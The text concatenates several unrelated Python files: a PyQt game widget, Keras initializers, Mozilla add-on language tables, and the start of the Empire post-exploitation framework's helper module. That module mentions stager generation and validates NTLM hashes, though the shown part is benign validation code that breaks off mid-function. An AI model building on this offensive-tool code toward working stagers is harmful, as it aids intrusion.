def _actionPhaseSquareSelection(self, pos):
"""Action Phase Square selection. difference from the move phase is
after the second square is selected, the function ends """
# select active character and targets
if self.game.active_char is None:
self._activeCharSelect(pos)
elif self.game.active_char.pos == pos:
# gui cleanup
if self.game.active_target is not None:
self._squareDeselect(self.game.active_target.pos)
self.game.active_target = None
self._activeCharDeselect()
else:
self._actionPhaseTargetSelection(pos)
def _actionPhaseTargetSelection(self, pos):
"""continuation method of action phase square select. Select or
deselect target """
if self.game.active_target is None:
self._activeTargetSelect(pos)
# Deselect active target
elif self.game.active_target.pos == pos:
self._activeTargetDeselect()
def _activeCardSelect(self, card_index):
"""Select or deselect card and update the gui """
self.game.active_card_select(card_index)
self.hand.activateCard(card_index)
self.hand.activateCard(
self.game.active_squad().active_card(card_index))
# TODO: Make call to the hand to lock the rest of the hand
def _activeCardDeselect(self):
"""Cleanup the selected cards """
self.game.active_card_deselect()
self.hand.deactivateCard(self.game.active_squad().active_card(None))
def _actionDraw(self):
"""Clean up board if necessary, draw card, update the gui to reflect
changes """
self._log("{0} Card Draw".format(self.game.print_status()))
self.game.action_draw()
def _resetTempComponents(self):
"""Clear selected and active components """
if self.game.active_char is not None:
self._squareDeselect(self.game.active_char.pos)
self.game.active_char = None
if self.game.possible_targets is not None:
self._possibleTargetsDeactivate()
self.game.possible_targets = None
if self.game.active_target is not None:
self._squareDeselect(self.game.active_target.pos)
self.game.active_target = None
def _charMove(self, char, pos):
"""moves character to new position in game and gui. Gui needs to change
before the game, since the char.pos will be overwritten if the game
changes first """
self._log("{0} moved to {1} -> {2}".format(char.name, char.pos, pos))
self.board.moveChar(char.pos, pos, char.side, char.name.split()[-1])
self.game.move_char(char, pos)
self._squadUpdate()
if self.game.num_moves < 1:
self._movePhaseEnd()
def _activeCharSelect(self, pos):
"""Select active character in game and gui and activate possible
targets Called in the move phase and action phase for active char
select """
self.game.active_char_select(pos)
self._squareSelect(pos)
self._possibleTargetsActivate()
def _activeCharDeselect(self):
"""Deselect active char and deactivate possible targets """
self._possibleTargetsDeactivate()
self._squareDeselect(self.game.active_char.pos)
self._resetTempComponents()
def _activeTargetSelect(self, pos):
"""deactivate possible targets, select target in game and gui. Called
by the _actionPhaseTargetSelection() """
self._possibleTargetsDeactivate()
self.game.set_active_target(pos)
self._squareSelect(pos)
def _activeTargetDeselect(self):
"""Deselect active target and activate possible targets """
self._squareDeselect(self.game.active_target.pos)
self._possibleTargetsActivate()
self.game.active_target = None
def _movePhaseSet(self):
"""Resets the hand, disables action buttons, unlocks active squad and
skip move button """
# self._resetHand()
# update dice values
self._diceUpdate()
# lock actions down
self.actions.disableActions()
# unlock skip button
self.actions.skip.setDisabled(False)
# unlock characters so they can move
self._unlockActiveSquad()
##########################################################################
# Widget/View Modifiers
##########################################################################
def _actionPhaseSet(self):
"""Update action phase widgets """
self._actionButtonsUnlock()
self.actions.skip.setDisabled(True)
self._unlockActiveSquad()
# Action Widget
def _actionButtonsUnlock(self):
"""Locks and unlocks buttons based on actions available """
# lock or unlock action buttons if able
if self.game.active_squad().can_draw_card():
# unlocks draw ability
self.actions.draw.setDisabled(False)
# TODO: might be unnecessary since the hand is already visible
if self.game.active_squad().has_hand():
# unlock play button
self.actions.play.setDisabled(False)
if self.game.active_squad().can_heal_main() or \
self.game.active_squad().can_heal_minor():
# unlock heal button
self.actions.heal.setDisabled(False)
# Squad Widget
def _squadUpdate(self, squad_index=None):
"""Refresh squad information after all actions """
if squad_index is None:
self.squads.updateTab(self.game.active_squad().to_json())
else:
self.squads.updateTab(self.game.squads()[squad_index].to_json())
def _squadsUpdate(self):
for index, squad in enumerate(self.game.squads()):
self._squadUpdate(index)
# Dice Widget
def _diceUpdate(self):
"""Sets the dice widget updates and deactivates """
self.dice.set_result(self.game.dice().num(), self.game.dice().is_all())
self._log("Roll {0}".format(self.game.dice().print_result()))
# Hand Widget
def _handUpdate(self, squad_index=None):
"""get list of all locked and unlocked cards """
if squad_index is None:
hand_json = [card.to_json()
for card in self.game.active_squad().hand]
else:
hand_json = [card.to_json()
for card in self.game.squads()[squad_index].hand]
# print(hand_json)
self.hand.setCards(hand_json)
def _handsUpdate(self):
for index, squad in enumerate(self.game.squads()):
self._handUpdate(index)
# Board Widget
def _lockActiveSquad(self):
"""locks the active squad characters on the board """
self.board.lockSquares(self.game.get_active_chars())
def _unlockActiveSquad(self):
"""unlocks the active squad characters on the board """
self.board.unlockSquares(self.game.get_active_chars())
def _squareSelect(self, pos):
"""Select the active character in game and gui """
self.board.squareSelect(pos)
def _squareDeselect(self, pos):
"""Deselect the active character in game and gui """
self.board.squareDeselect(pos)
def _possibleTargetsDeactivate(self):
"""Deactivate possible targets """
self.board.deactivateSquares(self.game.possible_targets)
def _possibleTargetsActivate(self):
"""Activate possible targets """
self.board.activateSquares(self.game.possible_targets)
# Log Widget
def _log(self, info):
"""Appends state changes and events to the log """
self.log.append(info)
# multiple widgets
def _squadGuiUpdate(self):
"""Update hand, squad gui """
self._squadUpdate()
self._handUpdate()
###########################################################################
# Game Setup methods
###########################################################################
def _charsPlace(self):
"""Place all characters on the board gui """
for squad in self.game.squads():
self._charPlace(squad.chars[0], squad.chars[0].pos)
list_pos = self.game.get_adj_empty_pos(squad.chars[0].pos)
self._charPlace(squad.chars[1], list_pos[0])
self._charPlace(squad.chars[2], list_pos[1])
def _charPlace(self, char, pos):
"""places character in new position in game and gui """
self._log("{0} placed at {1}".format(char.name, pos))
self.game.char_place(char, pos)
self.board.placeChar(pos, char.side, char.name.split()[-1])
#########################################################################
# Event/Selection Methods
#########################################################################
def _actionClicked(self, action_type):
"""Action button click responses """
# TODO: move the skip button out of actions
if action_type == Action.skip:
self._movePhaseEnd()
else:
if action_type == Action.draw:
if len(self.game.active_squad().hand) == MAX_HAND_SIZE:
# TODO: discard card to draw
self._discardCard()
self._actionDraw()
elif action_type == Action.heal:
self._discardToHeal()
else:
if self.game.can_play_card():
self.game.action_play_card()
# update temp
self._resetTempComponents()
# update gui after changes
self._squadUpdate()
self._handUpdate()
if not self.game.active_squad().has_action():
self._actionPhaseEnd()
def _squareClicked(self, pos):
"""Select active square or target square """
if self.game.is_move_phase():
self._movePhaseSquareSelection(pos)
else:
self._actionPhaseSquareSelection(pos)
def _cardClicked(self, card_index):
if self.game.active_card() is None:
self.game.set_active_card(card_index)
self.hand.cardSelect(card_index)
else:
self.hand.cardDeselect(self.game.active_card())
self.game.set_active_card(None)
###########################################################################
# Game Widget methods
###########################################################################
def __build_controls(self):
"""Builds the widgets and the connections to the widgets """
self.board = BoardWidget(self.game.board())
QObject.connect(self.board, SIGNAL("select"), self._squareClicked)
self.hand = HandWidget()
QObject.connect(self.hand, SIGNAL("cardClick"), self._cardClicked)
self.squads = SquadTabWidget(self.game.squads_json())
# QObject.connect(self.squad, SIGNAL("squadSignal"), self._squadSignal)
self.actions = ActionWidget(self)
QObject.connect(self.actions, SIGNAL("actionClicked"),
self._actionClicked)
self.dice = DiceWidget()
self.log = LogWidget()
def __build_layout(self):
"""builds the layouts of the widgets """
self.verticalLayout = QVBoxLayout()
self.vertical2Layout = QVBoxLayout()
self.horizontalLayout = QHBoxLayout()
self.horizontal2Layout = QHBoxLayout()
self.actionDiceHLayout = QHBoxLayout()
self.actionDiceHLayout.setSpacing(0)
self.actionDiceHLayout.addWidget(self.actions)
self.actionDiceHLayout.addWidget(self.dice)
self.boardCardVLayout = QVBoxLayout()
self.boardCardVLayout.setSpacing(0)
self.boardCardVLayout.addWidget(self.board)
self.boardCardVLayout.addWidget(self.hand)
self.horizontalLayout.addLayout(self.boardCardVLayout)
self.vertical2Layout.addWidget(self.log)
self.vertical2Layout.addWidget(self.squads)
self.vertical2Layout.addLayout(self.actionDiceHLayout)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout.addLayout(self.vertical2Layout)
self.verticalLayout.addLayout(self.horizontal2Layout)
self.setLayout(self.verticalLayout)
if __name__ == '__main__':
    # Manual smoke-test entry point: build a two-squad game and show it.
    import sys
    from PyQt4.QtGui import QApplication
    app = QApplication(sys.argv)
    from pyduel_engine.content.engine_states import BoardType
    from pyduel_engine.utilities import squad_utilities as s_utils
    from pyduel_engine.content.engine_states import SqState as SqState
    from pyduel_engine.model.engine import Engine
    from pyduel_engine.epic_plugin.epic_states import Main
    squads = [s_utils.setup_squad(1, Main.dooku, SqState.dark),
              s_utils.setup_squad(2, Main.mace, SqState.light)]
    board_type = BoardType.ruins
    test_engine = Engine({'squads': squads, 'board_type': board_type})
    test_engine.num_players = 2
    # NOTE(review): GameWidget.__init__ reads self.parent().game, but an
    # Engine (not a QWidget wrapper exposing .game) is passed here — verify
    # this harness still runs.
    win = GameWidget(test_engine)
    win.show()
    sys.exit(app.exec_())
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras initializer classes (soon to be replaced with core TF initializers).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.keras.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.contrib.keras.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops.init_ops import Constant
from tensorflow.python.ops.init_ops import Initializer
from tensorflow.python.ops.init_ops import Ones
from tensorflow.python.ops.init_ops import Orthogonal
from tensorflow.python.ops.init_ops import RandomNormal
from tensorflow.python.ops.init_ops import RandomUniform
from tensorflow.python.ops.init_ops import TruncatedNormal
from tensorflow.python.ops.init_ops import VarianceScaling
from tensorflow.python.ops.init_ops import Zeros
class Identity(Initializer):
    """Initializer producing a (scaled) identity matrix.

    Valid only for square 2D weight matrices.

    Arguments:
        gain: Multiplicative factor applied to the identity matrix.
    """

    def __init__(self, gain=1.):
        self.gain = gain

    def __call__(self, shape, dtype=None):
        # Guard clause: anything other than a square 2D shape is an error.
        if len(shape) == 2 and shape[0] == shape[1]:
            return self.gain * np.identity(shape[0])
        raise ValueError('Identity matrix initializer can only be used '
                         'for 2D square matrices.')

    def get_config(self):
        return {'gain': self.gain}
def lecun_normal(seed=None):
    """LeCun normal initializer.

    Draws from a truncated normal distribution centered on 0 with
    `stddev = sqrt(1 / fan_in)`, where `fan_in` is the number of input
    units in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        - [Self-Normalizing Neural Networks](https://arxiv.org/abs/1706.02515)
        - [Efficient
          Backprop](http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf)
    """
    return VarianceScaling(
        mode='fan_in', scale=1., distribution='normal', seed=seed)
def lecun_uniform(seed=None):
    """LeCun uniform initializer.

    Draws from a uniform distribution within [-limit, limit] where
    `limit = sqrt(3 / fan_in)` and `fan_in` is the number of input units
    in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        LeCun 98, Efficient Backprop,
        http://yann.lecun.com/exdb/publis/pdf/lecun-98b.pdf
    """
    config = dict(scale=1., mode='fan_in', distribution='uniform', seed=seed)
    return VarianceScaling(**config)
def glorot_normal(seed=None):
    """Glorot normal initializer, also called Xavier normal initializer.

    Draws from a truncated normal distribution centered on 0 with
    `stddev = sqrt(2 / (fan_in + fan_out))`, where `fan_in` / `fan_out`
    are the numbers of input / output units in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        Glorot & Bengio, AISTATS 2010
        http://jmlr.org/proceedings/papers/v9/glorot10a/glorot10a.pdf
    """
    initializer = VarianceScaling(scale=1., mode='fan_avg',
                                  distribution='normal', seed=seed)
    return initializer
def glorot_uniform(seed=None):
    """Glorot uniform initializer, also called Xavier uniform initializer.

    Draws from a uniform distribution within [-limit, limit] where
    `limit = sqrt(6 / (fan_in + fan_out))`, with `fan_in` / `fan_out`
    the numbers of input / output units in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        Glorot & Bengio, AISTATS 2010
        http://jmlr.org/proceedings/papers/v9/glorot10a/glorot10a.pdf
    """
    config = dict(scale=1., mode='fan_avg', distribution='uniform', seed=seed)
    return VarianceScaling(**config)
def he_normal(seed=None):
    """He normal initializer.

    Draws from a truncated normal distribution centered on 0 with
    `stddev = sqrt(2 / fan_in)`, where `fan_in` is the number of input
    units in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        He et al., http://arxiv.org/abs/1502.01852
    """
    return VarianceScaling(
        mode='fan_in', scale=2., distribution='normal', seed=seed)
def he_uniform(seed=None):
    """He uniform variance scaling initializer.

    Draws from a uniform distribution within [-limit, limit] where
    `limit = sqrt(6 / fan_in)` and `fan_in` is the number of input
    units in the weight tensor.

    Arguments:
        seed: A Python integer. Used to seed the random generator.

    Returns:
        An initializer.

    References:
        He et al., http://arxiv.org/abs/1502.01852
    """
    config = dict(scale=2., mode='fan_in', distribution='uniform', seed=seed)
    return VarianceScaling(**config)
# Compatibility aliases
# Lower-case names kept so configs/code written against the older Keras
# initializer API keep deserializing; all resolve to the classes above.
# pylint: disable=invalid-name
zero = zeros = Zeros
one = ones = Ones
constant = Constant
uniform = random_uniform = RandomUniform
normal = random_normal = RandomNormal
truncated_normal = TruncatedNormal
identity = Identity
orthogonal = Orthogonal
# pylint: enable=invalid-name
# Utility functions
def serialize(initializer):
    """Return the serialized (JSON-compatible) form of *initializer*."""
    return serialize_keras_object(initializer)
def deserialize(config, custom_objects=None):
    """Recover an initializer instance from its serialized `config` dict.

    Looks the class name up in this module's globals, falling back to
    `custom_objects` for user-defined initializers.
    """
    return deserialize_keras_object(
        config,
        module_objects=globals(),
        custom_objects=custom_objects,
        printable_module_name='initializer')
def get(identifier):
    """Resolve *identifier* (dict config, string name, or callable) into
    an initializer, raising ValueError for anything else."""
    if isinstance(identifier, dict):
        return deserialize(identifier)
    if isinstance(identifier, six.string_types):
        # Bare string: treat it as a class name with an empty config.
        return deserialize({'class_name': str(identifier), 'config': {}})
    if callable(identifier):
        return identifier
    raise ValueError('Could not interpret initializer identifier:', identifier)
| |
# Languages that we support on AMO, e.g we have translations for them
# and they're tested.
AMO_LANGUAGES = {
'af': {'english': 'Afrikaans', 'native': 'Afrikaans'},
'ar': {'english': 'Arabic', 'native': '\u0639\u0631\u0628\u064a'},
'ast': {'english': 'Asturian', 'native': 'Asturianu'},
'az': {'english': 'Azerbaijani', 'native': 'Az\u0259rbaycanca'},
'bg': {
'english': 'Bulgarian',
'native': '\u0411\u044a\u043b\u0433\u0430\u0440\u0441\u043a\u0438',
},
'bn': {'english': 'Bengali', 'native': '\u09ac\u09be\u0982\u09b2\u09be'},
'bs': {'english': 'Bosnian', 'native': 'Bosanski'},
'ca': {'english': 'Catalan', 'native': 'Catal\xe0'},
'cak': {'english': 'Kaqchikel', 'native': 'Maya Kaqchikel'},
'cs': {'english': 'Czech', 'native': '\u010ce\u0161tina'},
'da': {'english': 'Danish', 'native': 'Dansk'},
'de': {'english': 'German', 'native': 'Deutsch'},
'dsb': {'english': 'Lower Sorbian', 'native': 'Dolnoserb\u0161\u0107ina'},
'el': {
'english': 'Greek',
'native': '\u0395\u03bb\u03bb\u03b7\u03bd\u03b9\u03ba\u03ac',
},
'en-CA': {'english': 'English (Canadian)', 'native': 'English (Canadian)'},
'en-GB': {'english': 'English (British)', 'native': 'English (British)'},
'en-US': {'english': 'English (US)', 'native': 'English (US)'},
'es': {'english': 'Spanish', 'native': 'Espa\xf1ol'},
'et': {'english': 'Estonian', 'native': 'Eesti keel'},
'eu': {'english': 'Basque', 'native': 'Euskara'},
'fa': {'english': 'Persian', 'native': '\u0641\u0627\u0631\u0633\u06cc'},
'fi': {'english': 'Finnish', 'native': 'suomi'},
'fr': {'english': 'French', 'native': 'Fran\xe7ais'},
'fy-NL': {'english': 'Frisian', 'native': 'Frysk'},
'ga-IE': {'english': 'Irish', 'native': 'Gaeilge'},
'gu': {
'english': 'Gujarati',
'native': '\u0a97\u0ac1\u0a9c\u0ab0\u0abe\u0aa4\u0ac0',
},
'he': {'english': 'Hebrew', 'native': '\u05e2\u05d1\u05e8\u05d9\u05ea'},
'hr': {'english': 'Croatian', 'native': 'Hrvatski'},
'hsb': {'english': 'Upper Sorbian', 'native': 'Hornjoserbsce'},
'hu': {'english': 'Hungarian', 'native': 'magyar'},
'id': {'english': 'Indonesian', 'native': 'Bahasa Indonesia'},
'it': {'english': 'Italian', 'native': 'Italiano'},
'ja': {'english': 'Japanese', 'native': '\u65e5\u672c\u8a9e'},
'ka': {
'english': 'Georgian',
'native': '\u10e5\u10d0\u10e0\u10d7\u10e3\u10da\u10d8',
},
'kab': {'english': 'Kabyle', 'native': 'Taqbaylit'},
'ko': {'english': 'Korean', 'native': '\ud55c\uad6d\uc5b4'},
'lt': {'english': 'Lithuanian', 'native': 'Lietuvi\u0173'},
'lv': {'english': 'Latvian', 'native': 'Latvie\u0161u'},
'mk': {
'english': 'Macedonian',
'native': '\u041c\u0430\u043a\u0435\u0434\u043e\u043d\u0441\u043a\u0438', # noqa
},
'mn': {'english': 'Mongolian', 'native': '\u041c\u043e\u043d\u0433\u043e\u043b'},
'ms': {'english': 'Malay', 'native': 'Melayu'},
'mt': {
'english': 'Maltese',
'native': 'Malti',
},
'nb-NO': {'english': 'Norwegian (Bokm\xe5l)', 'native': 'Norsk bokm\xe5l'},
'nl': {'english': 'Dutch', 'native': 'Nederlands'},
'nn-NO': {'english': 'Norwegian (Nynorsk)', 'native': 'Norsk nynorsk'},
'pa-IN': {
'english': 'Punjabi (India)',
'native': '\u0a2a\u0a70\u0a1c\u0a3e\u0a2c\u0a40 (\u0a2d\u0a3e\u0a30\u0a24)', # noqa
},
'pl': {'english': 'Polish', 'native': 'Polski'},
'pt-BR': {
'english': 'Portuguese (Brazilian)',
'native': 'Portugu\xeas (do\xa0Brasil)',
},
'pt-PT': {'english': 'Portuguese (Portugal)', 'native': 'Portugu\xeas (Europeu)'},
'ro': {'english': 'Romanian', 'native': 'Rom\xe2n\u0103'},
'ru': {
'english': 'Russian',
'native': '\u0420\u0443\u0441\u0441\u043a\u0438\u0439',
},
'sk': {'english': 'Slovak', 'native': 'sloven\u010dina'},
'sl': {'english': 'Slovenian', 'native': 'Sloven\u0161\u010dina'},
'sq': {'english': 'Albanian', 'native': 'Shqip'},
'sv-SE': {'english': 'Swedish', 'native': 'Svenska'},
'te': {'english': 'Telugu', 'native': '\u0c24\u0c46\u0c32\u0c41\u0c17\u0c41'},
'th': {'english': 'Thai', 'native': '\u0e44\u0e17\u0e22'},
'tr': {'english': 'Turkish', 'native': 'T\xfcrk\xe7e'},
'uk': {
'english': 'Ukrainian',
'native': '\u0423\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0430', # noqa
},
'ur': {'english': 'Urdu', 'native': '\u0627\u064f\u0631\u062f\u0648'},
'vi': {'english': 'Vietnamese', 'native': 'Ti\u1ebfng Vi\u1ec7t'},
'zh-CN': {
'english': 'Chinese (Simplified)',
'native': '\u4e2d\u6587 (\u7b80\u4f53)',
},
'zh-TW': {
'english': 'Chinese (Traditional)',
'native': '\u6b63\u9ad4\u4e2d\u6587 (\u7e41\u9ad4)',
},
}
# Languages supported by product-details that we don't have translations for
# and haven't been tested. It's fine to move languages up to `AMO_LANGUAGES`
# but make sure they're tested.
# Languages in here are used for example in statistics views.
ADDITIONAL_PRODUCT_LANGUAGES = {
'ach': {'english': 'Acholi', 'native': 'Acholi'},
'ak': {'english': 'Akan', 'native': 'Akan'},
'am-et': {'english': 'Amharic', 'native': '\u12a0\u121b\u122d\u129b'},
'an': {'english': 'Aragonese', 'native': 'aragon\xe9s'},
'as': {
'english': 'Assamese',
'native': '\u0985\u09b8\u09ae\u09c0\u09af\u09bc\u09be',
},
'azz': {
'english': 'Highland Puebla Nahuatl',
'native': 'nahuatl sierra norte Puebla',
},
'be': {
'english': 'Belarusian',
'native': '\u0411\u0435\u043b\u0430\u0440\u0443\u0441\u043a\u0430\u044f', # noqa
},
'bm': {'english': 'Bambara', 'native': 'Bamanankan'},
'br': {'english': 'Breton', 'native': 'Brezhoneg'},
'brx': {'english': 'Bodo', 'native': u"\u092c\u0930'"},
'ca-valencia': {
'english': 'Catalan (Valencian)',
'native': 'catal\xe0 (valenci\xe0)',
},
'csb': {'english': 'Kashubian', 'native': 'Kasz\xebbsczi'},
'cy': {'english': 'Welsh', 'native': 'Cymraeg'},
'de-AT': {'english': 'German (Austria)', 'native': 'Deutsch (\xd6sterreich)'},
'de-CH': {'english': 'German (Switzerland)', 'native': 'Deutsch (Schweiz)'},
'de-DE': {'english': 'German (Germany)', 'native': 'Deutsch (Deutschland)'},
'ee': {'english': 'Ewe', 'native': 'E\u028be'},
'en-AU': {'english': 'English (Australian)', 'native': 'English (Australian)'},
'en-NZ': {'english': 'English (New Zealand)', 'native': 'English (New Zealand)'},
'en-ZA': {
'english': 'English (South African)',
'native': 'English (South African)',
},
'eo': {'english': 'Esperanto', 'native': 'Esperanto'},
'es-AR': {'english': 'Spanish (Argentina)', 'native': 'Espa\xf1ol (de Argentina)'},
'es-CL': {'english': 'Spanish (Chile)', 'native': 'Espa\xf1ol (de Chile)'},
'es-ES': {'english': 'Spanish (Spain)', 'native': 'Espa\xf1ol (de Espa\xf1a)'},
'es-MX': {'english': 'Spanish (Mexico)', 'native': 'Espa\xf1ol (de M\xe9xico)'},
'ff': {'english': 'Fulah', 'native': 'Pulaar-Fulfulde'},
'fj-FJ': {'english': 'Fijian', 'native': 'Vosa vaka-Viti'},
'fur-IT': {'english': 'Friulian', 'native': 'Furlan'},
'ga': {'english': 'Irish', 'native': 'Gaeilge'},
'gd': {'english': 'Gaelic (Scotland)', 'native': 'G\xe0idhlig'},
'gl': {'english': 'Galician', 'native': 'Galego'},
'gn': {'english': 'Guarani', 'native': u"Ava\xf1e'\u1ebd"},
'gu-IN': {
'english': 'Gujarati (India)',
'native': '\u0a97\u0ac1\u0a9c\u0ab0\u0abe\u0aa4\u0ac0 (\u0aad\u0abe\u0ab0\u0aa4)', # noqa
},
'ha': {'english': 'Hausa', 'native': 'Hausa'},
'hi': {'english': 'Hindi', 'native': '\u0939\u093f\u0928\u094d\u0926\u0940'},
'hi-IN': {
'english': 'Hindi (India)',
'native': '\u0939\u093f\u0928\u094d\u0926\u0940 (\u092d\u093e\u0930\u0924)', # noqa
},
'hy-AM': {
'english': 'Armenian',
'native': '\u0540\u0561\u0575\u0565\u0580\u0565\u0576',
},
'ig': {'english': 'Igbo', 'native': 'Igbo'},
'is': {'english': 'Icelandic', 'native': '\xedslenska'},
'ja-JP-mac': {'english': 'Japanese', 'native': '\u65e5\u672c\u8a9e'},
'kk': {'english': 'Kazakh', 'native': '\u049a\u0430\u0437\u0430\u049b'},
'km': {'english': 'Khmer', 'native': '\u1781\u17d2\u1798\u17c2\u179a'},
'kn': {'english': 'Kannada', 'native': '\u0c95\u0ca8\u0ccd\u0ca8\u0ca1'},
'kok': {'english': 'Konkani', 'native': '\u0915\u094b\u0902\u0915\u0928\u0940'},
'ks': {'english': 'Kashmiri', 'native': '\u0643\u0634\u0645\u06cc\u0631\u06cc'},
'ku': {'english': 'Kurdish', 'native': 'Kurd\xee'},
'la': {'english': 'Latin', 'native': 'Latina'},
'lg': {'english': 'Luganda', 'native': 'Luganda'},
'lij': {'english': 'Ligurian', 'native': 'Ligure'},
'ln': {'english': 'Lingala', 'native': 'Ling\xe1la'},
'lo': {'english': 'Lao', 'native': '\u0e9e\u0eb2\u0eaa\u0eb2\u0ea5\u0eb2\u0ea7'},
'ltg': {'english': 'Latgalian', 'native': 'Latgalie\u0161u valoda'},
'mai': {
'english': 'Maithili',
'native': '\u092e\u0948\u0925\u093f\u0932\u0940 \u09ae\u09c8\u09a5\u09bf\u09b2\u09c0', # noqa
},
'mg': {'english': 'Malagasy', 'native': 'Malagasy'},
'mi': {'english': 'Maori (Aotearoa)', 'native': 'M\u0101ori (Aotearoa)'},
'ml': {'english': 'Malayalam', 'native': '\u0d2e\u0d32\u0d2f\u0d3e\u0d33\u0d02'},
'mr': {'english': 'Marathi', 'native': '\u092e\u0930\u093e\u0920\u0940'},
'my': {
'english': 'Burmese',
'native': '\u1019\u103c\u1014\u103a\u1019\u102c\u1018\u102c\u101e\u102c', # noqa
},
'ne-NP': {'english': 'Nepali', 'native': '\u0928\u0947\u092a\u093e\u0932\u0940'},
'nr': {'english': 'Ndebele, South', 'native': 'isiNdebele'},
'nso': {'english': 'Northern Sotho', 'native': 'Sepedi'},
'oc': {'english': 'Occitan (Lengadocian)', 'native': 'occitan (lengadocian)'},
'or': {'english': 'Odia', 'native': '\u0b13\u0b21\u0b3c\u0b3f\u0b06'},
'pa': {'english': 'Punjabi', 'native': '\u0a2a\u0a70\u0a1c\u0a3e\u0a2c\u0a40'},
'rm': {'english': 'Romansh', 'native': 'rumantsch'},
'rw': {'english': 'Kinyarwanda', 'native': 'Ikinyarwanda'},
'sa': {
'english': 'Sanskrit',
'native': '\u0938\u0902\u0938\u094d\u0915\u0943\u0924',
},
'sah': {'english': 'Sakha', 'native': '\u0421\u0430\u0445\u0430\u043b\u044b\u044b'},
'sat': {'english': 'Santali', 'native': '\u0938\u0902\u0924\u093e\u0932\u0940'},
'si': {'english': 'Sinhala', 'native': '\u0dc3\u0dd2\u0d82\u0dc4\u0dbd'},
'son': {'english': 'Songhai', 'native': 'So\u014bay'},
'sr': {'english': 'Serbian', 'native': '\u0421\u0440\u043f\u0441\u043a\u0438'},
'sr-Cyrl': {'english': 'Serbian', 'native': '\u0421\u0440\u043f\u0441\u043a\u0438'},
'sr-Latn': {'english': 'Serbian', 'native': 'Srpski'},
'ss': {'english': 'Siswati', 'native': 'siSwati'},
'st': {'english': 'Southern Sotho', 'native': 'Sesotho'},
'sw': {'english': 'Swahili', 'native': 'Kiswahili'},
'ta': {'english': 'Tamil', 'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd'},
'ta-IN': {
'english': 'Tamil (India)',
'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd (\u0b87\u0ba8\u0bcd\u0ba4\u0bbf\u0baf\u0bbe)', # noqa
},
'ta-LK': {
'english': 'Tamil (Sri Lanka)',
'native': '\u0ba4\u0bae\u0bbf\u0bb4\u0bcd (\u0b87\u0bb2\u0b99\u0bcd\u0b95\u0bc8)', # noqa
},
'tl': {'english': 'Tagalog', 'native': 'Tagalog'},
'tn': {'english': 'Tswana', 'native': 'Setswana'},
'ts': {'english': 'Tsonga', 'native': 'Xitsonga'},
'tsz': {'english': 'Pur\xe9pecha', 'native': 'Pur\xe9pecha'},
'tt-RU': {'english': 'Tatar', 'native': 'Tatar\xe7a'},
'uz': {'english': 'Uzbek', 'native': 'O\u02bbzbek tili'},
've': {'english': 'Venda', 'native': 'Tshiven\u1e13a'},
'wo': {'english': 'Wolof', 'native': 'Wolof'},
'x-testing': {
'english': 'Testing',
'native': '\u0166\u1e17\u015f\u0167\u012b\u019e\u0260',
},
'xh': {'english': 'Xhosa', 'native': 'isiXhosa'},
'yo': {'english': 'Yoruba', 'native': 'Yor\xf9b\xe1'},
'zu': {'english': 'Zulu', 'native': 'isiZulu'},
}
# Merged lookup table; on a duplicate key the ADDITIONAL_PRODUCT_LANGUAGES
# entry (the right-hand operand) would win.
ALL_LANGUAGES = {**AMO_LANGUAGES, **ADDITIONAL_PRODUCT_LANGUAGES}
| |
"""
Misc. helper functions used in Empire.
Includes the PowerShell functions that generate the
randomized stagers.
"""
from time import localtime, strftime
from Crypto.Random import random
import re
import string
import commands
import base64
import binascii
import sys
import os
import socket
import sqlite3
import iptools
###############################################################
#
# Validation methods
#
###############################################################
def validate_hostname(hostname):
    """
    Tries to validate a hostname.

    Returns True when *hostname* is a syntactically valid DNS name:
    at most 255 characters overall, with each dot-separated label
    1-63 alphanumeric/hyphen characters that neither starts nor ends
    with a hyphen.
    """
    # Explicit empty-string rejection (previously fell through to the
    # label check); overall DNS length limit is 255 characters.
    if not hostname or len(hostname) > 255:
        return False
    # A single trailing dot marks an absolute name and is allowed.
    if hostname[-1:] == ".":
        hostname = hostname[:-1]
    # Raw string: "\d" in a plain string is an invalid escape sequence
    # (DeprecationWarning on modern Pythons).
    allowed = re.compile(r"(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
    return all(allowed.match(x) for x in hostname.split("."))
def validate_ip(IP):
    """
    Uses iptools to validate an IP.

    Thin wrapper around iptools.ipv4.validate_ip; IPv4 only.
    """
    return iptools.ipv4.validate_ip(IP)
def validate_ntlm(data):
    """
    Check that *data* begins with 32 hex characters (an NTLM hash).

    NOTE: the pattern is anchored only at the start, so longer strings
    whose first 32 characters are hex also validate (kept as-is).
    """
    hash_pattern = re.compile("^[0-9a-f]{32}", re.IGNORECASE)
    return hash_pattern.match(data) is not None
def generate_ip_list(s):
    """
    Takes a comma separated list of IP/range/CIDR addresses and
    generates an IP range list.

    Accepts entries of the form "a.b.c.d", "a.b.c.d-e.f.g.h" and
    "a.b.c.d/nn" (newline/space/comma separated).  Returns an
    iptools.IpRangeList, or None when the input is empty or nothing
    validated.
    """
    # strip newlines and make everything comma separated
    s = ",".join(s.splitlines())
    # strip out spaces
    s = ",".join(s.split(" "))
    # Arguments for IpRangeList are accumulated as source text and eval'd
